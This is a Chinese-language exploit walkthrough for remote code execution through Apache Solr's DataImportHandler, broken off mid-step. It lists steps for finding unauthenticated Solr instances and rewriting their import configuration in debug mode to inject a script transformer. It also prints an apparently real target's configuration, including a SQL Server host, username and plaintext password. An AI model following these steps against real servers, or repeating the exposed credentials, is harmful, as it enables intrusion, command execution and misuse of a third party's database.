Apache Solr Exploits 🌟
Apache Solr Some Exploits 🌟
Apache Solr DataImportHandler RCE
Apache Solr < 8.2.0 并且开启了DataImportHandler模块(默认情况下该模块不被启用)
1.首先判读是否solr不需认证直接可访问后台(大多数均可访问)
2.判断是否存在collections
3.判断collections是否可以使用dataimport功能
4.debug模式修改configuration
原:
<dataConfig><dataSource type="JdbcDataSource"driver="com.microsoft.sqlserver.jdbc.SQLServerDriver"url="jdbc:sqlserver://SqlServer;databaseName=TrainUpCore"user="pid.trainup"password="S@cram3nt0"readOnly="true"></dataSource><document name="TrainUpDoc"><entity name="Lo" query="select newid() id, * from CatalogSearch.Categories_LiveTrainingWithoutLocation order by ItemTitle"><field column="ItemTitle" name="ItemTitle"></field><field column="ItemCourseId" name="ItemCourseId"></field><field column="ItemDescription" name="ItemDescription"></field><field column="Price" name="ItemPrice"></field><field column="ItemDurationType" name="ItemDurationType"></field><field column="ItemDurationValue" name="ItemDurationValue"></field><field column="typeItemCode" name="typeItemCode"></field><field column="ProviderWeight" name="ProviderWeight"></field><field column="ItemCatId" name="ItemCatId"></field><field column="PublishedDate" name="PublishedDate"></field><field column="ItemImageUrl" name="ItemImageUrl"></field><field column="ItemTrainingRating" name="ItemTrainingRating"></field><field column="#Row" name="#Row"></field><field column="ItemCatImageUrl" name="ItemCatImageUrl"></field><field column="ItemEventsno" name="ItemEventsno"></field><field column="CourseWeight" name="CourseWeight"></field><field column="CategoryRankScore" name="CategoryRankScore"></field></entity></document></dataConfig>
[1] 无回显 直接执行命令修改:
(1)在entity中添加transformer=”script:f1”,f1为函数名
(2)添加